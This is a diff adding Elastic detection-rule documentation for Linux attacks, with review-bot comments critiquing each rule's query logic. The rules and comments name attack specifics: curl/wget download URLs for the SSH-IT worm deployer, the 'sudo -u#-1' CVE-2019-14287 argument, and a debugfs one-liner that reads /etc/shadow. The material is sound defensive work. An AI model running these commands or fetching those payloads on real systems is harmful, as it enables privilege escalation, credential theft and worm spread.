@@ -0,0 +1,78 @@ +[[prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded]] +=== Potential SSH-IT SSH Worm Downloaded + +Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.thc.org/ssh-it/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend +* Data Source: Elastic Endgame + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name in ("curl", "wget") and process.args : ( + "https://thc.org/ssh-it/x", "http://nossl.segfault.net/ssh-it-deploy.sh", "https://gsocket.io/x", + "https://thc.org/ssh-it/bs", "http://nossl.segfault.net/bs" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ +* Technique: +** Name: Remote Service Session Hijacking +** ID: T1563 +** Reference URL: https://attack.mitre.org/techniques/T1563/ +* Sub-technique: +** Name: SSH Hijacking +** ID: T1563.001 +** Reference URL: 
https://attack.mitre.org/techniques/T1563/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc new file mode 100644 index 0000000000..17e989e88c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc 
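Review bot: `process.args : (...)` in the `Rule query` block lists five literal URLs with no wildcards, so any trivial variant (`http://` in place of `https://`, a `www.` prefix, a trailing `/` or query string) evades the rule; prefer host-and-path wildcards such as `"*thc.org/ssh-it/*"`, `"*segfault.net/ssh-it-deploy.sh*"` and `"*gsocket.io/x*"`. Two metadata mismatches in the same hunk: the tags list `Data Source: Elastic Endgame`, but `Rule indices` contains only `logs-endpoint.events.*` and the query accepts only `event.action == "exec"`, so Endgame data (`endgame-*`, `exec_event`, as used by the sibling rules) is never queried; and the description covers only SSH-IT while the URL list also includes `https://gsocket.io/x`, which should either be mentioned in the description or moved to its own rule.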
@@ -0,0 +1,73 @@ +[[prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected]] +=== Potential Successful Linux FTP Brute Force Attack Detected + +An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, auditd.data.addr, related.user with maxspan=5s + [authentication where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + event.action == "authenticated" and auditd.data.terminal == "ftp" and event.outcome == "failure" and + auditd.data.addr != null and auditd.data.addr != "0.0.0.0" and auditd.data.addr != "::"] with runs=10 + [authentication where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + event.action == "authenticated" and auditd.data.terminal == "ftp" and event.outcome == "success" and + auditd.data.addr != null and 
auditd.data.addr != "0.0.0.0" and auditd.data.addr != "::"] | tail 1 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc new file mode 100644 index 0000000000..43eeb88094 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc 
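Review bot: the ATT&CK mapping lists `Password Spraying (T1110.003)`, but the sequence is keyed on `host.id, auditd.data.addr, related.user`, so ten failures must hit the same user from the same source before the success; a spray (one password tried across many users) never forms a sequence. Either drop the sub-technique or add a second, user-agnostic sequence keyed on `host.id, auditd.data.addr`. Also, `runs=10` inside `maxspan=5s` requires eleven FTP PAM events within five seconds, i.e. more than two attempts per second from one source; any tool paced slower than that falls outside the window, which is tighter than the "short time interval" the description suggests, so the window and threshold deserve a sentence in the description.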
@@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected]] +=== Potential Successful Linux RDP Brute Force Attack Detected + +An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, related.user with maxspan=5s + [authentication where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + event.action == "authenticated" and auditd.data.terminal : "*rdp*" and event.outcome == "failure"] with runs=10 + [authentication where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + event.action == "authenticated" and auditd.data.terminal : "*rdp*" and event.outcome == "success"] | tail 1 + +---------------------------------- + +*Framework*: MITRE 
ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc new file mode 100644 index 0000000000..0d5615c2be --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc 
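Review bot: unlike the FTP sibling rule, this sequence is keyed only on `host.id, related.user` and has no source-address term, so ten failures from one address followed by the user's own legitimate success from a different address within five seconds produces an alert labelled as a successful brute force. If the xrdp PAM records carry `auditd.data.addr`, add it to the `sequence by` keys together with the `!= "0.0.0.0"` / `!= "::"` guards the FTP rule uses; if they do not, the description should say that the success cannot be tied to the failing source so analysts know to verify it manually.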
@@ -0,0 +1,109 @@ +[[prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack]] +=== Potential Successful SSH Brute Force Attack + +Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-system.auth-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 8 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Successful SSH Brute Force Attack + +The rule identifies consecutive SSH login failures followed by a successful login from the same source IP address to the same target host indicating a successful attempt of brute force password guessing. + +#### Possible investigation steps + +- Investigate the login failure user name(s). +- Investigate the source IP address of the failed ssh login attempt(s). +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. + +### False positive analysis + +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Infrastructure or availability issue. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. 
+- Ensure active session(s) on the host(s) are terminated as the attacker could have gained initial access to the system(s). +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, source.ip, user.name with maxspan=15s + [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and + event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] with runs=10 + + [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and + event.outcome == "success" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: 
https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc new file mode 100644 index 0000000000..daa20c768b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc 
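Review bot: the description says adversaries "attempt to login into multiple users with a common or known password", but `sequence by host.id, source.ip, user.name` only matches ten failures and a success for the same user name, so the password-spray case the description (and the `T1110.003` mapping) describes is exactly the one this rule cannot see. Either reword to password guessing against a single account or add a user-agnostic variant keyed on `host.id, source.ip`. Separately, `Severity: high` / `Risk score: 73` here versus `medium` / `47` for the FTP and RDP siblings with the same `runs=10` logic looks inconsistent; if SSH is deliberately rated higher, the description should say why.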
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-sudo-hijacking-detected]] +=== Potential Sudo Hijacking Detected + +Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://eapolsniper.github.io/2020/08/17/Sudo-Hijacking/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 103 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:file and event.type:("creation" or "file_create_event") and +file.path:("/usr/bin/sudo" or "/bin/sudo") and not process.name:(docker or dockerd) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Sudo and Sudo Caching +** ID: T1548.003 +** Reference URL: https://attack.mitre.org/techniques/T1548/003/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** 
ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc new file mode 100644 index 0000000000..a869fb2fa5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc 
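Review bot: `event.type:("creation" or "file_create_event")` on `/usr/bin/sudo` or `/bin/sudo` will fire on every legitimate package upgrade (`dpkg`, `rpm`, `dnf`, `apt`), and the only exclusion is `not process.name:(docker or dockerd)`. Since this is a `new_terms` rule, the new-terms field should be stated in the doc so readers can judge whether a first-seen package manager per host is what suppresses that noise; an explicit exclusion for the distribution's package manager would be more predictable. Conversely, an attacker who stages a fake binary elsewhere and moves it into place with `mv` may produce a rename rather than a creation event, so consider also matching the rename action to cover the "replace it" case the description talks about.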
@@ -0,0 +1,63 @@ +[[prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287]] +=== Potential Sudo Privilege Escalation via CVE-2019-14287 + +This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command "sudo -u#-1" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.exploit-db.com/exploits/47502 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Use Case: Vulnerability + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "sudo" and process.args == "-u#-1" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc new file mode 100644 index 0000000000..7f922fb36c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc 
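Review bot: the version in the description is wrong: CVE-2019-14287 was fixed in sudo 1.8.28, so "prior to v1.28" should read "prior to 1.8.28". The query `process.args == "-u#-1"` is also narrower than the exploit it cites: the same bug is triggered by `-u#4294967295` (the unsigned form of -1) and by passing the user as a separate token (`-u` followed by `#-1`). Suggest `process.args in ("-u#-1", "-u#4294967295", "#-1", "#4294967295")` so both spellings are caught.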
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection]] +=== Potential Sudo Token Manipulation via Process Injection + +This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/nongiach/sudo_inject + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.session_leader.entity_id with maxspan=15s +[ process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name == "gdb" and process.user.id != "0" and process.group.id != "0" ] +[ process where host.os.type == "linux" and event.action == "uid_change" and event.type == "change" and + process.name == "sudo" and process.user.id == "0" and process.group.id == "0" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: 
https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Ptrace System Calls +** ID: T1055.008 +** Reference URL: https://attack.mitre.org/techniques/T1055/008/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Sudo and Sudo Caching +** ID: T1548.003 +** Reference URL: https://attack.mitre.org/techniques/T1548/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc new file mode 100644 index 0000000000..7a695dd23b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc 
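Review bot: the first sequence step pins the injector to `process.name == "gdb"`, but the referenced sudo_inject technique only needs ptrace; a renamed gdb, a Python script using `ctypes`, or any small custom binary escapes the rule while still producing the `sudo` uid change in step two. If the endpoint exposes ptrace-attach events, key the first step on those rather than on the binary name. Two smaller points: `process.user.id != "0" and process.group.id != "0"` excludes a non-root user whose primary group is gid 0, whereas `process.user.id != "0"` alone expresses "not already root"; and a developer who runs `gdb` and then `sudo` within 15 s in the same session matches the sequence, which the description should call out as the main false positive.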
@@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access]] +=== Potential Suspicious DebugFS Root Device Access + +This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the "disk" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with "disk" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#disk-group + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name == "debugfs" and process.args : "/dev/sd*" and not process.args == "-R" and +not user.Ext.real.id == "0" and not group.Ext.real.id == "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* 
Sub-technique: +** Name: Local Accounts +** ID: T1078.003 +** Reference URL: https://attack.mitre.org/techniques/T1078/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc new file mode 100644 index 0000000000..a522b8e4d3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc 
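Review bot: `not process.args == "-R"` in the `Rule query` block excludes the non-interactive form `debugfs -R "cat /etc/shadow" /dev/sda1`, which is the one-liner an attacker in the `disk` group is most likely to run, while keeping only the interactive form; if the exclusion was added for an administrative tool, scope it to that tool rather than to every `-R`. Also, `process.args : "/dev/sd*"` only covers SCSI/SATA naming; NVMe (`/dev/nvme*`), virtio (`/dev/vd*`), Xen (`/dev/xvd*`) and device-mapper/LVM (`/dev/mapper/*`, `/dev/dm-*`) devices, which are the norm on cloud hosts, are missed. Suggest `process.args : ("/dev/sd*", "/dev/nvme*", "/dev/vd*", "/dev/xvd*", "/dev/mapper/*", "/dev/dm-*")`.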
@@ -0,0 +1,74 @@ +[[prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected]] +=== Potential SYN-Based Network Scan Detected + +This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination ports using 2 or less packets per port. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.network-* +* logs-network_traffic.* +* packetbeat-* +* auditbeat-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Network +* Tactic: Discovery +* Tactic: Reconnaissance +* Use Case: Network Security Monitoring + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: 
https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Scanning IP Blocks +** ID: T1595.001 +** Reference URL: https://attack.mitre.org/techniques/T1595/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc new file mode 100644 index 0000000000..d9f3edc572 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc 
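Review bot: the description promises "10 or more destination ports using 2 or less packets per port", but the rendered rule shows only the KQL filter (`destination.port : * and network.packets <= 2 and source.ip : (10.0.0.0/8 or ...)`) and none of the threshold settings (the grouping fields and the cardinality on `destination.port`), so a reader cannot verify the stated logic; the threshold fields belong in the doc next to the query. Second, the `source.ip` clause restricts the rule to RFC 1918 sources, so external scanners, IPv6 sources and CGNAT (`100.64.0.0/10`) hosts are never considered; state that scope in the description or widen the filter.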
@@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected]] +=== Potential Unauthorized Access via Wildcard Injection Detected + +This rule monitors for the execution of the "chown" and "chmod" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.exploit-db.com/papers/33930 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name in ("chown", "chmod") and process.args == "-R" and process.args : "--reference=*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: 
https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc new file mode 100644 index 0000000000..3495229b03 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc 
